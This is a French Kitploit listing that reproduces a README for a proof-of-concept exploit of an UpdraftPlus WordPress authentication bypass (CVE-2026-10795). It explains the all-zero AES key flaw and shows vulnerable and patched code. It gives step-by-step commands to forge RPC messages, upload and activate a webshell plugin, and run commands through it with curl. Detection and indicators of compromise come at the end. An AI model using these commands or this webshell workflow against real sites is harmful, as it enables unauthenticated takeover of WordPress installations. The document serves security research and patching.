Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-10795 — CVE-2026-10795 – Contournement d'authentification UpdraftPlus | Kitploit
Outils/GitHubGitHub/izxci/cve-2026-10795
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationDéveloppement de Charges Utiles
GitHubizxci/cve-2026-10795

CVE-2026-10795

CVE-2026-10795 – Contournement d'authentification UpdraftPlus

Voir le dépôt
1il y a 2 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-10795

CVE-2026-10795 – PoC du contournement d’authentification UpdraftPlus

⚠️ Avertissement : Ce dépôt est uniquement à but éducatif.
Utilisez-le uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de test.
L’auteur n’est pas responsable de toute utilisation abusive.


📋 Vue d’ensemble

ChampDétails
PluginUpdraftPlus: WP Backup & Migration
Versions affectées≤ 1.26.4
Version corrigée1.26.5
Score CVSS8.1 (Élevé)
Type de vulnérabilitéContournement d’authentification non authentifié → RCE
Découvert parvtim (Wordfence Bug Bounty)
Prime$5,200

🔍 Résumé de la vulnérabilité

UpdraftPlus enregistre un écouteur RPC non authentifié à chaque chargement de page pour les sites connectés à UpdraftCentral.

La fonction decrypt_message() ne valide pas la valeur de retour de $rsa->decrypt().
Lorsque le déchiffrement RSA échoue, false est passé à Rijndael::setKey(), ce qui se réduit à une clé AES-128 entièrement nulle et déterministe.

Un attaquant peut :

  1. Forger un udrpc_message chiffré avec la clé nulle
  2. Faire en sorte que le serveur le déchiffre avec succès
  3. Exécuter des commandes RPC arbitraires en tant qu’administrateur connecté
  4. Téléverser et activer un plugin malveillant → Exécution de code à distance

🧬 Code vulnérable

root@kitploit:~
// updraftplus/includes/class-remote-communications-v2.php
// Lines 460-491 (version 1.26.4)

$sym_key = $rsa->decrypt($sym_key);
// ❌ No return value check!

$rij->setKey($sym_key);  // false → all-zero key
return $rij->decrypt($ciphertext);

✅ Code corrigé

root@kitploit:~
$sym_key = $rsa->decrypt($sym_key);

// ✅ Added in 1.26.5
if (false === $sym_key || !is_string($sym_key) || strlen($sym_key) < 16) {
    return false;
}

$rij->setKey($sym_key);
return $rij->decrypt($ciphertext);

📁 Structure du dépôt

root@kitploit:~
updraftplus-auth-bypass/
├── README.md
├── poc.py                  # Main exploit script
├── requirements.txt        # Python dependencies
├── payloads/
│   ├── list_plugins.py     # List installed plugins
│   ├── upload_shell.py     # Upload webshell plugin
│   └── activate_plugin.py  # Activate uploaded plugin
├── shell/
│   ├── build_shell.py      # Builds webshell ZIP
│   └── test-shell.php      # Minimal PHP webshell
└── docs/
    ├── technical-analysis.md
    └── patch-diff.md

⚙️ Installation

root@kitploit:~
git clone https://github.com/yourname/updraftplus-auth-bypass
cd updraftplus-auth-bypass
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests==2.31.0
pycryptodome==3.20.0

🧪 Configuration de l’environnement de test

1. Installer XAMPP

root@kitploit:~
https://www.apachefriends.org
Start: Apache + MySQL

2. Installer WordPress + UpdraftPlus 1.26.4

root@kitploit:~
# Place WordPress in htdocs
C:/xampp/htdocs/wordpress/

# Install vulnerable plugin version
# Download: https://plugins.trac.wordpress.org/browser/updraftplus/tags/1.26.4

3. Se connecter à UpdraftCentral

root@kitploit:~
WordPress Admin → Settings → UpdraftPlus → UpdraftCentral tab → Connect

⚠️ Requis : Le site doit être connecté à UpdraftCentral pour que la vulnérabilité soit exploitable.


🚀 Utilisation

Utilisation de base

root@kitploit:~
python poc.py --url http://localhost/wordpress/ --user-id 1

Lister les plugins

root@kitploit:~
python poc.py --url http://localhost/wordpress/ --cmd plugin.get_plugins

Téléverser un webshell

root@kitploit:~
# Step 1: Build the shell ZIP
python shell/build_shell.py

# Step 2: Upload
python poc.py --url http://localhost/wordpress/ --cmd upload_shell

# Step 3: Activate
python poc.py --url http://localhost/wordpress/ --cmd activate_shell

# Step 4: Test RCE
curl "http://localhost/wordpress/wp-content/plugins/test-shell/test-shell.php?cmd=whoami"

🔬 Comment ça fonctionne

root@kitploit:~
poc.py
  │
  ├─ 1. Craft malformed RSA-encrypted sym_key (garbage bytes)
  │
  ├─ 2. Encrypt RPC payload with ZERO AES-128 key (0x00 * 16)
  │
  ├─ 3. Build udrpc_message:
  │       [3-byte hex len][fake_sym_key][16-byte hex cipherlen][ciphertext]
  │
  ├─ 4. POST to target (no auth, no nonce, no cookies needed)
  │
  └─ 5. Server-side:
          rsa->decrypt(garbage) → false
          setKey(false)         → 0x00 key
          decrypt(ciphertext)   → our payload ✅
          wp_set_current_user() → admin access
          RPC command executes  → RCE 💀

🛡️ Détection et atténuation

Atténuation

root@kitploit:~
Update UpdraftPlus to version 1.26.5 immediately.

Détection (analyse des journaux)

root@kitploit:~
# Look for suspicious POST requests with udrpc_message
grep "udrpc_message" /var/log/apache2/access.log

# Wordfence users are protected since June 3, 2026

Indicateurs de compromission

root@kitploit:~
- Unexpected plugin installations
- New PHP files in wp-content/plugins/
- POST requests to WordPress root with udrpc_message parameter
- Unexpected admin-level actions in WordPress logs

📅 Chronologie de la divulgation


📚 Références

  • Avis Wordfence
  • Page du plugin UpdraftPlus
  • Documentation RSA de phpseclib
  • Journal des modifications du plugin

👤 Crédits

  • Découverte initiale : vtim (programme Wordfence Bug Bounty)
  • Auteur du PoC : izxci
  • Objectif : Éducatif / Recherche en sécurité

📜 Licence

root@kitploit:~
MIT License – For educational use only.
Unauthorized use against systems you don't own is illegal.
Télécharger l’outil
DateÉvénement
1er juin 2026Vulnérabilité soumise via Wordfence Bug Bounty
3 juin 2026Validée et divulguée à l’éditeur
3 juin 2026Règle de pare-feu Wordfence Premium déployée
4 juin 2026L’éditeur a accusé réception
5 juin 2026Correctif publié (v1.26.5)
3 juillet 2026Protection Wordfence Free active